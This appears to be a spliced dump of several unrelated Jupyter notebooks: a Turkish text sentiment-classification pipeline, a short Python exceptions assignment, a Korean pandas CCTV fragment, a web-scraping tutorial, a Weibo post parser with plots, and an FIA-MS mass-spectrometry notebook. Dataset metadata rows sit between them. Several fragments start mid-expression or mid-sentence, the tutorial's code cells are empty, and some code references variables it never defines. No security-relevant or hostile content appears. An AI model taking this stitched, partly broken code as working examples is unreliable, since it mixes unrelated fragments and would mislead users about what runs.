# Encode the string labels as integers. Fit the encoder on the training
# labels only and *transform* the test labels, so both splits are guaranteed
# to share the same label -> integer mapping (fit_transform on the test set
# would refit and could assign different codes).
# -

encoder = preprocessing.LabelEncoder()
train_y = encoder.fit_transform(train_y)
test_y = encoder.transform(test_y)
train_y[:10]
test_y[:10]
# ### Count Vectors
# Learn the vocabulary (one feature per unique word) from the training texts.
vectorizer = CountVectorizer()
vectorizer.fit(train_x)
# +
# train_x transformed into count vectors
# -
train_x_count = vectorizer.transform(train_x)
test_x_count = vectorizer.transform(test_x)
# +
# to inspect the result
# -
# each unique word became a feature, so get_feature_names returns the
# *names of those features* (the learned vocabulary)
# NOTE(review): get_feature_names() was removed in scikit-learn 1.2 in
# favour of get_feature_names_out() - confirm the installed version.
vectorizer.get_feature_names()[:5]
# the matrix of per-document word counts for those vocabulary entries
train_x_count.toarray()
# ### TF-IDF
# Fit the word-level TF-IDF vectorizer on the training texts only.
tf_idf_word_vectorizer = TfidfVectorizer()
tf_idf_word_vectorizer.fit(train_x)
# #### word level TF-IDF
x_train_tf_idf_word = tf_idf_word_vectorizer.transform(train_x)
x_test_tf_idf_word = tf_idf_word_vectorizer.transform(test_x)
# +
# feature names (the vocabulary learned from train_x)
# NOTE(review): get_feature_names() was removed in scikit-learn 1.2 in
# favour of get_feature_names_out() - confirm the installed version.
# -
tf_idf_word_vectorizer.get_feature_names()[:5]
# +
# the TF-IDF weight matrix for the training set (dense view; may be large)
# -
x_train_tf_idf_word.toarray()
# #### N-Gram Level TF-IDF
# TF-IDF algoritmasını N-gram kullanarak oluşturma
# TF-IDF over word n-grams (2- and 3-grams), fitted on the training texts.
tf_idf_ngram_vectorizer = TfidfVectorizer(ngram_range=(2,3))
tf_idf_ngram_vectorizer.fit(train_x)
x_train_tf_idf_ngram = tf_idf_ngram_vectorizer.transform(train_x)
x_test_tf_idf_ngram = tf_idf_ngram_vectorizer.transform(test_x)
# +
# feature names - fixed: this cell previously displayed the *word-level*
# vectorizer's vocabulary instead of the n-gram one
# -
tf_idf_ngram_vectorizer.get_feature_names()[:5]
# +
# matrix - fixed: show the n-gram TF-IDF matrix, not the word-level one
# -
x_train_tf_idf_ngram.toarray()
# #### Character Level TF-IDF
# Character-level TF-IDF over 2- and 3-character n-grams.
tf_idf_char_vectorizer = TfidfVectorizer(analyzer='char',ngram_range=(2,3))
tf_idf_char_vectorizer.fit(train_x)
x_train_tf_idf_char = tf_idf_char_vectorizer.transform(train_x)
x_test_tf_idf_char = tf_idf_char_vectorizer.transform(test_x)
# +
# feature names (character n-grams)
# -
tf_idf_char_vectorizer.get_feature_names()[:5]
# +
# matrix - fixed: this cell previously displayed the *word-level* matrix
# instead of the character-level one
# -
x_train_tf_idf_char.toarray()
# ## Makine Öğrenmesi ile Sentiment Sınıfladırması
# Farklı Classification Modelleri ile denemeler yapacağız.
# ### Lojistik Regresyon
# #### Count-Vectors
# +
# Logistic regression on raw count vectors, scored with 10-fold CV on the test split.
loj = linear_model.LogisticRegression()
loj_model = loj.fit(train_x_count, train_y)
accuracy = model_selection.cross_val_score(loj_model,
                                           test_x_count,
                                           test_y,
                                           cv=10).mean()
print('Count Vectors Doğruluk Oranı : ', accuracy)
# -

# #### Word-Level TF-IDF

# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(x_train_tf_idf_word, train_y)
accuracy = model_selection.cross_val_score(loj_model,
                                           x_test_tf_idf_word,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores word-level TF-IDF, not count vectors
print('Word-Level TF-IDF Doğruluk Oranı : ', accuracy)
# -

# #### N-Gram TF-IDF

# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(x_train_tf_idf_ngram, train_y)
accuracy = model_selection.cross_val_score(loj_model,
                                           x_test_tf_idf_ngram,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores n-gram TF-IDF, not count vectors
print('N-Gram TF-IDF Doğruluk Oranı : ', accuracy)
# -

# #### Char-Level TF-IDF

# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(x_train_tf_idf_char, train_y)
accuracy = model_selection.cross_val_score(loj_model,
                                           x_test_tf_idf_char,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores char-level TF-IDF, not count vectors
print('Char-Level TF-IDF Doğruluk Oranı : ', accuracy)
# -
# ### Naive Bayes
# #### Count Vectors
# +
# Multinomial Naive Bayes on raw count vectors, scored with 10-fold CV.
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(train_x_count, train_y)
accuracy = model_selection.cross_val_score(nb_model,
                                           test_x_count,
                                           test_y,
                                           cv=10).mean()
print('Count Vectors Doğruluk Oranı : ', accuracy)
# -

# #### Word-Level TF-IDF Dogruluk Oranı

# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(x_train_tf_idf_word, train_y)
accuracy = model_selection.cross_val_score(nb_model,
                                           x_test_tf_idf_word,
                                           test_y,
                                           cv=10).mean()
print('Word-Level TF-IDF Doğruluk Oranı : ', accuracy)
# -

# #### N-Gram TF-IDF

# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(x_train_tf_idf_ngram, train_y)
accuracy = model_selection.cross_val_score(nb_model,
                                           x_test_tf_idf_ngram,
                                           test_y,
                                           cv=10).mean()
# typo fixed: 'TD-IDF' -> 'TF-IDF'
print('N-Gram TF-IDF Doğruluk Oranı : ', accuracy)
# -

# #### Char-Level TF-IDF

# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(x_train_tf_idf_char, train_y)
# fixed NameError: the score was evaluated on the undefined
# x_test_tf_idf_ngram_char; the char-level test matrix is x_test_tf_idf_char
accuracy = model_selection.cross_val_score(nb_model,
                                           x_test_tf_idf_char,
                                           test_y,
                                           cv=10).mean()
print('Char-Level TF-IDF Doğruluk Oranı : ', accuracy)
# -
# ### Random Forests
# #### Count Vectors
# +
# Random forest on raw count vectors, scored with 10-fold CV.
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(train_x_count, train_y)
accuracy = model_selection.cross_val_score(rf_model,
                                           test_x_count,
                                           test_y,
                                           cv=10).mean()
print('Count Vectors Doğruluk Oranı', accuracy)
# -

# #### Word-Level TF-IDF

# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(x_train_tf_idf_word, train_y)
accuracy = model_selection.cross_val_score(rf_model,
                                           x_test_tf_idf_word,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores word-level TF-IDF, not count vectors
print('Word-Level TF-IDF Doğruluk Oranı', accuracy)
# -

# #### N-Gram TF-IDF

# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(x_train_tf_idf_ngram, train_y)
accuracy = model_selection.cross_val_score(rf_model,
                                           x_test_tf_idf_ngram,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores n-gram TF-IDF, not count vectors
print('N-Gram TF-IDF Doğruluk Oranı', accuracy)
# -

# #### Char-Level TF-IDF

# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(x_train_tf_idf_char, train_y)
accuracy = model_selection.cross_val_score(rf_model,
                                           x_test_tf_idf_char,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores char-level TF-IDF, not count vectors
print('Char-Level TF-IDF Doğruluk Oranı', accuracy)
# -
# ### XGBoost
# #### Count Vectors
# +
# XGBoost classifier on raw count vectors, scored with 10-fold CV.
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(train_x_count, train_y)
accuracy = model_selection.cross_val_score(xgb_model,
                                           test_x_count,
                                           test_y,
                                           cv=10).mean()
print('Count Vectors Doğruluk Oranı', accuracy)
# -

# #### Word-Level TF-IDF

# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(x_train_tf_idf_word, train_y)
accuracy = model_selection.cross_val_score(xgb_model,
                                           x_test_tf_idf_word,
                                           test_y,
                                           cv=10).mean()
print('Word Level Doğruluk Oranı', accuracy)
# -

# #### N-Gram TF-IDF

# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(x_train_tf_idf_ngram, train_y)
accuracy = model_selection.cross_val_score(xgb_model,
                                           x_test_tf_idf_ngram,
                                           test_y,
                                           cv=10).mean()
print('N-Gram Doğruluk Oranı', accuracy)
# -

# #### Char-Level TF-IDF

# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(x_train_tf_idf_char, train_y)
accuracy = model_selection.cross_val_score(xgb_model,
                                           x_test_tf_idf_char,
                                           test_y,
                                           cv=10).mean()
# label fixed: this cell scores char-level TF-IDF, not n-grams
print('Char-Level TF-IDF Doğruluk Oranı', accuracy)
# -
# +
# yapılan modellerden lojistik_reg'i seçelim....
# şimdi bunu iş planımıza uygulamamız lazım...
# yani yeni gelen bir yorumun sentiment skorunu çıkarmamız lazım...
# -
# ### Yeni bir yorumu model nesnemize analiz için sokalım....
# Bunun için text değerini ön işlemeye sokmalıyız...
# +
yeni_yorum = pd.Series('This film is very nice and good i like it')
yeni_yorum2 = pd.Series('no, not good look at that shit very bad')

# Vectorize the new comments with a CountVectorizer fitted on the *training*
# texts, so the feature columns line up with the count-vector models above.
v = CountVectorizer()
v.fit(train_x)
yeni_yorum = v.transform(yeni_yorum)
yeni_yorum2 = v.transform(yeni_yorum2)

# At this point `loj_model` holds the fit from the *last* logistic-regression
# cell that ran (char-level TF-IDF), whose feature space does not match the
# count vectors built here. Refit on the count-vector features before
# predicting, otherwise predict() raises a dimension-mismatch error.
loj = linear_model.LogisticRegression()
loj_model = loj.fit(train_x_count, train_y)

loj_model.predict(yeni_yorum)   # expected: positive

loj_model.predict(yeni_yorum2)  # expected: negative
# +
# negative algıladı
# -
| 12,671 |
/Advance Python Assignment 6.ipynb
|
10ba96b13d842e113f152a434b77e202fc3d8a47
|
[] |
no_license
|
Jayesh199224/Advance-Python-Assignment-6
|
https://github.com/Jayesh199224/Advance-Python-Assignment-6
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,928 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Q1. Describe three applications for exception processing.
#ans - Three applications of exception processing are: 1. try, 2. except, 3. finally
# +
#Q2. What happens if you don't do something extra to treat an exception?
#ans - if we don't do something extra to treat an exception then the code will stuck within the error and it will not proceed further
# +
#Q3. What are your options for recovering from an exception in your script?
#ans- using finally or using your own custom exception are options for recovering from an exception.
# +
#Q4. Describe two methods for triggering exceptions in your script?
#ans- raise and multiple except clause are two methods
# +
#Q5. Identify two methods for specifying actions to be executed at termination time, regardless of whether or not an exception exists.
#ans - else method and finally method
(CCTV_sorted['2014년'] + CCTV_sorted['2015년'] + CCTV_sorted['2016년'])/CCTV_sorted['2013년도 이전'])*100)
CCTV_seoul.sort_values(by='증가율').head()
#CCTV_seoul
#header=2 -> 처음 헤더 2줄 스킵, usecols="B, D, G, J, N" -> 엑셀의 B, D...열을 읽어라
pop_seoul = pd.read_excel('population_in_Seoul.xls', header=2, usecols='B, D,G, J, N')
pop_seoul.head()
# +
# 컬럼명 변경
# DataFrame안의 rename메소드 이용
# 0번컬럼 - 구별 / 1번컬럼 - 인구수 / 2번컬럼 - 한국인 / 3번컬럼 - 외국인 / 4번컬럼 - 고령자
CCTV_seoul.rename(columns={CCTV_seoul.columns[0]: '구별'}, inplace=True)
pop_seoul.rename(columns={pop_seoul.columns[0]: '구별', pop_seoul.columns[1]: '한국인', pop_seoul.columns[2]: '외국인', pop_seoul.columns[3]: '고령자'}, inplace=True)
pop_seoul.head()
# +
# 0번 인덱스행의 데이터는 총합계이므로 필요없다 - 삭제
# 삭제 확인
#'구별'의 데이터값 확인한다
#'구별'의 na값 확인한다
#na값 확인된 행 삭제한다
# 삭제 확인
#drop은 행을 삭제할때 사용하는 명령어
pop_seoul.drop([0], inplace=True) # 0번인덱스의 데이터 삭제
pop_seoul.head()
# +
#외국인비율 열을 추가한다 ; 인구수 대비 외국인 비율을 계산한다
#고령자비율 열을 추가한다 ; 인구수 대비 고령자 비율을 계산한다
#인구수 가장 많은 상위구 5개 조회
#외국인 가장 많은 상위구 5개 조회
#고령자 가장 많은 상위구 5개 조회
made out of cells. A cell can either contain Markdown text - like this one - or code. In the latter you can execute your code. To see what that means, type the following command in the next cell `print("hello world")`.
# + jupyter={"outputs_hidden": true}
# -
# ## Getting started
# Now, let's import the libraries we need to get started with scraping. Type `import requests`, `from bs4 import BeautifulSoup`, `import pandas as pd` and `import csv`.
# + jupyter={"outputs_hidden": true}
# -
# **What's in a name**
# Scraping is the act of automatically downloading selected data from a website. Scraping is also known as web scraping, web harvesting, web data extraction and data scraping. It can be a very valuable tool for your newsroom: instead of saving data from the web by hand, you can automate and speed up the process by writing a custom Python program that downloads the information for you.
#
#
#
#
# **What we'll actually will be doing, when I say 'we're scraping a website':**
#
# - tell your computer which site to visit: where do you want to download data from?
# - we'll be using the `requests` library to requests webpages
# - save the webpage (the html-page) to the computer
# - this too will be done with library `requests`
# - from the webpage, select the data you want to have
# - we'll be using `BeautifulSoup` to do this
# - write the selection to a csv-file
# - this is done with the `csv` library
#
# If there is more than 1 page where you want to get data from, you can tell your computer to move on the next page to repeat the process. But that's for another course... :)
#
# # Scraping a website
#
# ## Request webpage
# We'll be scraping a list of [Power Reactors](https://www.nrc.gov/reactors/operating/list-power-reactor-units.html) from the site of the US government. First we need to let our computer know what site we want to visit; than we can request the site using `requests.get('http://website.com')`.
# + jupyter={"outputs_hidden": true}
# -
# If you want your code to become more easily reusable, you can rewrite to:
# Note that `requests.get(url)` doesn't have the url in quotes; it's clear the url is a string by the quotation marks in `url = 'https://www.nrc.gov/reactors/operating/list-power-reactor-units.html'`.
#
# To check if everything went right, we can simply type `page`; this will return a response code. Status codes are issued by a server in response to a client's request made to the server. Read more about these codes on the [wikipedia page on status codes](). Basically, if you have a 200 response code, the website loaded in just fine.
# ## Parse HTML, select data
# Now that we've got the page, let's parse the htmlpage. To parse is just nerd speak for splitting up the original data in smaller bits. Use `BeautifulSoup(page.content, 'html.parser')`. It's pretty common when scraping, to name the first with BeautifulSoup created file 'soup'. This 'soup' variable will contain all html of the page once we're done.
#
# Of course, if you want to see what is in 'soup', you could type `print(soup)`. (Notice how there are no quotation marks, since the soup we're referring to is a variable that has data stored inside of it and it is not a string.) But when you add `soup` on a new line, the computer will also print your soup. Again: programmers like things short and sweet.
#
# Btw, the library is named after the Beautiful Soup from Alice in Wonderland... Not kidding.
#
# Now, let's make ourselves some soup...
# Next you want to select the table from this soup. Thanks to the BeautifulSoup library, you can do this writing `soup.find('table')`, this command will look for the first `<table>` in the source code of the webpage, also known as our soup.
# Next, let's get all rows in the table. The HTML code for rows in a table is `<tr>`. We can use the BeautifulSoup command `.find_all('tr')` to get all of these rows.
# See how with `.find_all('')` you can find all rows at once, while `.find('')` will just get you the first one of whatever it is your looking for.
#
# Since there is only 1 table on this webpage, you can either use `soup.find_all('tr')` or `table.find_all('tr')`. But if there are two or more tables on one page, the `soup.find_all('tr')` command will get you all rows, from all tables. `table.find_all('tr')` builds upon `soup.find('table')`, which will give you the **first** table; meaning that `table.find_all('tr')` will get all rows from the first table only.
#
# Don't believe me? Let's try and use `soup.find_all('tr')`...
# You see? Exactly the same result. Just remember; whatever assignment you give to your computer, it always refers to the data that is before the `.assignment`. Meaning `soup.find_all('tr')` looks for '`tr`'s' in `soup`, and `table.find_all('tr')` looks for `tr`s in `table`.
#
#
# Now let's say that you are especially interested in the 21st row. What do you do? Since computers start counting at zero, you should ask it for row 20 to get to see the 21st row. And since you saved all rows in the `rows` variable, you can actually say 'dear computer, give me row 20' by typing `rows[20]`.
# Looking at this row, do you recognize the different cells? Every cell starts with `<td>`, the HTML abbreviation for table data. You can use BeautifulSoup to look for all `td`'s in this 21st row by typing: `rows.find_all('td')`.
# Just for your information: you can even save the data from the `td`'s to a variable called cells, simply type ` cells = rows[21].find_all('td')`
# Now that you know how to only select 1 certain row, you can probably guess how to select a data cell. Exactly, use `cells[0]` to get the first cell of `cells`.
# It works, but it doesn't look too good, does it? Let's get rid of the HTML bits and pieces around our data. Add `.text` to get the job done.
# Looks much better, doesn't it?
#
# Unfortunately, there are too many rows in this table to get each cell like we got `Comanche Peak 105000445`. We'll going to have to automate it. Luckily this is one of the big benefits of programming.
#
# Here's what we're going to do:
# 1. create an empty list to be used later
# 2. extract the table from our soup, save it to the `table` variable
# 3. 'loop over' our table....
# 4. ...to save the data we need for each row in the table
# 5. add the selected data to the list
# 6. print the list
#
# At step 3 we'll 'loop over' the table. What does it mean? Well, using a for loop as its called means that we'll give our computer an assignment and have it done **for** every something. It's like your mum when she told you to treat your friends with candy: **for every one of your friend, give them a piece of candy** It's shorter than naming all your friends one by one and repeating the assignment time and time again, right? We're doing exactly the same by telling our computer: **for every row in the table, get the data inside the cells**.
# Congrats! You just wrote your very first scraper - well done!
#
# ## Saving the scraped data
#
# Now, off course having your data printed inside the notebook is nice. But it would be even beter to store the data in a CSV file. Remember that I explained what we'd actually be doing? Off course things are a bit more complicated; let me explain. Here's what I told you before:
#
# - tell your computer which site to visit: where do you want to download data from?
# - we'll be using the `requests` library to requests webpages
# - save the webpage (the html-page) to the computer
# - this too will be done with library `requests`
# - from the webpage, select the data you want to have
# - we'll be using `BeautifulSoup` to do this
# - write the selection to a csv-file
# - this is done with the `csv` library
#
# Here's what the code will actually do:
# 1. Create a CSV file to save data in
# 2. Create a CSV writer to write data with to the CSV file
# 3. Tell your computer which site(s) to visit
# 4. Get the webpage
# 5. Select data from the webpage
# 6. Write data with the CSV writer to the CSV file
# 7. Save file
#
# ## Save data to CSV
#
# Here's how to save data to a CSV file using the CSV library - the process involves a couple steps:
# 1. create a file, open it, make sure it's 'writeable', use `open('filename.csv', 'w', encoding='utf8', newline='')`
# 2. create a writer, you'll need a writer if you want to write data to the file, use `csv.writer(filename, delimiter=',')`
# 3. write data to the file using the writer, use `writer.writerow([data])`
#
# Off course you can repeat step 3 as often as necessary.
# Using the `ls` command you can see that a new file was created.
# ## The scraper
# Before we broke our essay scraper into sentences before. Now I'll be putting all these sentences together. This way, you can get a good overview of what a scraper could look like. Here's a list of what we need to do, in the exact order:
# 1. Create a CSV file, open it, make it writeable
# 2. Create a CSV writer to write data
# 3. Write the column headers to the file
# 4. Tell your computer which site(s) to visit
# 5. Get the webpage
# 6. Select data from the webpage
# 7. Write data with the CSV writer to the CSV file
# 8. Save file
# + jupyter={"outputs_hidden": true}
# -
# If you want to check if everything worked as it's supposed to, you can import the ScrapedData.csv file as a dataframe using `pd.read_csv('filename.csv')`. Look at the dataframe to see if there's data in the file. Using `df.shape` you can even quickly check if there is as much data in the file as you'd expect.
# `df.shape` will give you the number of rows and columns of the dataframe. A quick way to check if really everything that should be in the CSV file is there.
# Note that the headers are in the dataset twice:
# while scraping we added header; but we also scraped the headers since the headers are in the first row of the table and we scraped all table rows...
#
# Now what?
#
# You can easily delete a row by using ``df.drop(df.index[N])``, to drop the Nth row by index number.
#
# To make sure you get the index number right, why not print the first rows once more? We're in a notebook after all... You can use ``df.head()``
# Looking at these first 5 rows, you'll find that you want to delete the row with indexnumber 0. As stated before, you can use ``df.drop``. By default Pandas will create and return a copy of your dataset, and delete the row of your choosing in that copy. This means that the original will still include dropped row.
#
# Consider this a safety belt when deleting data using Pandas. ;)
# To delete the first row in the original dataset - and not in a copy that Pandas will return to you; you'll need to use ``inplace=True``. The full command becomes: ``df.drop(df.index[0], inplace=True)``.
#
# ``inplace=True`` will delete the row in the original dataset, and won't return anything. Try it:
# To see that it worked, request the head of the dataframe...
# If you want to you can save this cleaned version, by using ``df.to_csv()``...
# Well done, happy web scraping!
| 13,223 |
/Visualization.ipynb
|
c5734d5ec1b0aa8b9d0db8efec1d114a5422f4e0
|
[
"MIT"
] |
permissive
|
luochang212/weibo-analysis
|
https://github.com/luochang212/weibo-analysis
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 40,934 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import csv
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from ipywidgets import interact
import seaborn as sns
import os
import os.path
class PrettySentences:
    """Parse exported Weibo text dumps into per-post fields.

    The exporter separates posts with the literal word "Read"; each fragment
    is then sliced apart with hard-coded offsets (see ``classification``).
    """

    def split(self, file):
        """Read *file* as UTF-8 text and split it on the marker "Read".

        Returns a list of raw text fragments, one per (expected) post.
        """
        with open(file, encoding="utf8") as cur_file:
            txt = cur_file.read()
        txt = str(txt)
        txt = txt.split("Read")
        return txt

    def classification(self, txt_array, file_index):
        """Extract parallel id/date/time/device/content arrays from fragments.

        *file_index* is used to build post ids of the form "<file>.<count>".
        Fragments that do not contain the "\\nYOUR_NAME" author marker are
        skipped (note: element 0 is also skipped — the range starts at 1).
        """
        id = np.array([])
        date = np.array([])
        time = np.array([])
        device = np.array([])
        content = np.array([])
        count = 0
        for ite in range(1, np.size(txt_array), 1):
            if txt_array[ite].find("\n"+"YOUR_NAME") != -1:
                # Post body runs from just after the author marker up to the
                # zero-width-space sentinel (\u200b) left by the exporter.
                cur_sentence = txt_array[ite][txt_array[ite].rfind("\n"+"YOUR_NAME") + len("\n"+"YOUR_NAME")+1:txt_array[ite].find("\u200b")]
                count += 1
                id = np.append(id, str(file_index) + '.' + str(count))
                # Device name follows the literal "come from " on the first line.
                # NOTE(review): the +10 offset assumes exactly one space after
                # "come from" — confirm against the export format.
                device = np.append(device, cur_sentence[cur_sentence.find("come from") + 10:].split("\n")[0])
                content = np.append(content, str(cur_sentence[cur_sentence.find("\n") + 1:]))
                if cur_sentence != '':
                    # Date/time live in the first ~16 characters, presumably as
                    # "MM-DD HH:MM"-style text — the slices below pick out the
                    # date up to two chars past the last '-' and the HH:MM
                    # around the last ':' (TODO confirm against real exports).
                    start = cur_sentence[0:11].rfind("-")
                    end = cur_sentence[0:16].rfind(":")
                    date = np.append(date, cur_sentence[0:start+3])
                    time = np.append(time, cur_sentence[end-2:end+3])
                else:
                    date = np.append(date, '')
                    time = np.append(time, '')
        # Sanity check: every field array must have one entry per counted post.
        # On any mismatch, report it and return five empty arrays.
        flag = 0
        if count != len(time):
            print("Error: time and sentence do not have same size in file {}".format(str(file_index)))
            flag = 1
        if count != len(device):
            print("Error: device and sentence do not have same size in file {}".format(str(file_index)))
            flag = 1
        if count != len(content):
            print("Error: content and sentence do not have same size in file {}".format(str(file_index)))
            flag = 1
        if flag == 1:
            id = np.array([])
            date = np.array([])
            time = np.array([])
            device = np.array([])
            content = np.array([])
        return id, date, time, device, content
def write_csv(all_weibo, path='weibo.csv'):
    """Write parsed Weibo records to a CSV file with a header row.

    Parameters
    ----------
    all_weibo : iterable of (id, date, time, device, content) tuples
        Typically ``zip(id, date, time, device, content)`` over parallel arrays.
    path : str, optional
        Destination file; defaults to ``'weibo.csv'`` (the original behavior).
    """
    id, date, time, device, content = zip(*all_weibo)
    # Flatten so callers may pass either scalars or nested arrays per column.
    id = np.array(id).flatten()
    date = np.array(date).flatten()
    time = np.array(time).flatten()
    device = np.array(device).flatten()
    content = np.array(content).flatten()
    # newline='' is required by the csv module; without it every row is
    # followed by a blank line on Windows.
    with open(path, "w", encoding="utf8", newline='') as csvFile:
        writer = csv.writer(csvFile)
        # write the title of csv file
        writer.writerow(['id', 'date', 'time', 'device', 'content'])
        # write the elements of weibo
        for i in range(len(id)):
            writer.writerow([id[i], date[i], time[i], device[i], content[i]])
    # The with-statement closes the file; the old explicit close() inside the
    # block was redundant and has been removed.
def test():
    """Smoke-test the parser on one exported source file and print the fragments."""
    parser = PrettySentences()
    fragments = np.array(parser.split("1001030102/source/2"))
    print(fragments)
    # Uncomment to also exercise field extraction on this file:
    # _id, _date, _time, _device, _content = parser.classification(fragments, 2)
    # print(_content)
def main():
    """Parse every exported file under data/ and write all posts to weibo.csv."""
    # Number of exported pages to process; could instead be derived from the
    # directory listing (see the commented expression).
    file_number = 58  # len([name for name in os.listdir("208999251/source")])
    paths = ["data/" + str(x) for x in range(1, file_number + 1)]
    id = np.array([])
    date = np.array([])
    time = np.array([])
    device = np.array([])
    content = np.array([])
    # Hoisted out of the loop: the parser is stateless, one instance suffices
    # (the original constructed a fresh PrettySentences per file).
    instance = PrettySentences()
    for i in range(file_number):
        txt_array = np.array(instance.split(paths[i]))
        _id, _date, _time, _device, _content = instance.classification(txt_array, i + 1)
        id = np.append(id, _id)
        date = np.append(date, _date)
        time = np.append(time, _time)
        device = np.append(device, _device)
        content = np.append(content, _content)
    write_csv(zip(id, date, time, device, content))


if __name__ == '__main__':
    main()
# -
data = pd.read_csv('weibo.csv')
# +
dates = np.array([str(x) for x in data.date])
new_dates = np.matrix([])
new_year = np.array([])
new_month = np.array([])
new_ite = np.array([])
ite = 0
def is_year(string):
    """Return the first known 4-digit year found in *string*.

    Checks the years 2013-2016 in order and falls back to '2017' when
    none of them appears.
    """
    for candidate in ('2013', '2014', '2015', '2016'):
        if candidate in string:
            return candidate
    return '2017'
for date in dates:
if date.find('-') != -1:
new_ite = np.append(new_ite, str(ite))
ite += 1
year = str(is_year(date).replace("-", ""))
new_year = np.append(new_year, year)
for date in dates:
if date.find('-') != -1:
if is_year(date) == '2017':
month = str(date[0:date.find("-")].replace(" ", ""))
else:
month = str(date[date.find("-"):date.find("-")+3].replace("-", "").replace(" ", ""))
new_month = np.append(new_month, month)
if len(new_year) == len(new_month):
new_dates = np.c_[new_ite, new_year, new_month]
else:
print("Error: The size of array is not the same.")
new_dates.shape[0]
# +
year_group = '2013', '2014', '2015', '2016', '2017'
month_group = 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sept', 'Oct', 'Nov', 'Dec'
values = np.zeros((len(year_group),len(month_group)))
for i in range(new_dates.shape[0]):
for year in range(len(year_group)):
for month in range(len(month_group)):
if new_dates[i, 1] == year_group[year] and new_dates[i, 2] == str(month+1):
values[year, month] += 1
ax = sns.heatmap(values, xticklabels=month_group, yticklabels=year_group, cmap='YlGnBu', cbar_kws={'label': 'Heat Map'})
ax.set(xlabel='Month', ylabel='Year Group')
# -
devices = np.array([str(x) for x in data.device])
new_device = np.array([])
for device in devices:
if device.find('华为Ascend P7') != -1 or device.find('华为麦芒4') != -1 or device.find('微博 weibo.com') != -1 \
or device.find('网易云音乐') != -1 or device.find('Android') != -1:
if device.find('华为Ascend P7')!= -1:
new_device = np.append(new_device, '华为Ascend P7')
elif device.find('华为麦芒4') != -1:
new_device = np.append(new_device, '华为麦芒4')
elif device.find('微博 weibo.com') != -1:
new_device = np.append(new_device, '微博 weibo.com')
elif device.find('网易云音乐') != -1:
new_device = np.append(new_device, '网易云音乐')
elif device.find('Android') != -1:
new_device = np.append(new_device, 'Android')
np.size(new_device)
# +
plt.hist(new_device, bins=5, facecolor="blue", edgecolor="black")
matplotlib.rcParams['font.sans-serif']=['SimHei']
plt.xlabel("devices")
plt.ylabel("frequency")
plt.title("Device distribution")
plt.show()
# +
time = [str(x) for x in data.time]
times = np.array([])
for hour in time:
times = np.append(times, hour[0:2])
times = np.array([int(time) for time in times if time != 'na'])
print(np.size(times))
print(times)
# +
plt.hist(times, bins=24, facecolor="blue", edgecolor="black")
plt.xlabel("hours")
plt.ylabel("frequency")
plt.title("Time distribution")
plt.show()
# +
from ipywidgets import interact
def f(p):
index = np.where(times == p)[0]
print(data.content[index])
print('Weibo sending time: ')
interact(f, p=(0,23));
| 7,717 |
/.ipynb_checkpoints/DL_NST-checkpoint.ipynb
|
e3f06084ba46475676e8f9ffd16557d17accc90c
|
[] |
no_license
|
OnsElleuch/DL_NST
|
https://github.com/OnsElleuch/DL_NST
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,905,712 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: FIA-MS
# language: python
# name: fia-ms
# ---
# # FIA-MS data processing and visualization
# This example notebook presents the use of the custom FIA-MS tools after data pre-processing using SmartPeak
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import BFAIR.FIA_MS as fia_ms
# Define the location of the example files
# current_dir = %pwd
feature_dir_example = (current_dir + "/data/FIA_MS_example/features_AdditionalAdducts_example")
sequence_triplicates_example = pd.read_csv(current_dir + "/data/FIA_MS_example/sequence_EColi_example.csv", sep=";")
sample_names_triplicates_example = sequence_triplicates_example["sample_group_name"].unique()
database_triplicates_example = pd.read_csv(current_dir + "/data/FIA_MS_example/CHEMISTRY/iJO1366_struct.tsv", sep="\t", header=None)
# ## Run the custom FIA-MS data processing functions
# You will
# - Extract all the relevant information from the provided .featureXML files
# - Calculate basic statistics
intensities_triplicates_example = fia_ms.extractNamesAndIntensities(feature_dir_example, sample_names_triplicates_example, database_triplicates_example)
stats_triplicates_example = fia_ms.calculateMeanVarRSD(intensities_triplicates_example, sequence_triplicates_example.drop_duplicates(["sample_group_name", "replicate_group_name"]), min_reps=3)
# Have quick look at what you extracted. The 'intensities_triplicates_example' should include all replicates of each sample
intensities_triplicates_example
# The summary statistics are reduced to one set per sample. Each of these sets is displayed here as one value per metabolite
stats_triplicates_example
# ### Visualize the data
# After importing and processing the data, we can visualize it. A good place to start is to have a look at the distributions of its mean values and the corresponding relative standard deviations.
# #### Mean
sns.violinplot(x="replicate_group_name", y="Mean", data=stats_triplicates_example, orient = 'v')
plt.xticks(rotation=70)
plt.title('Mean', size = 20)
# #### RSD
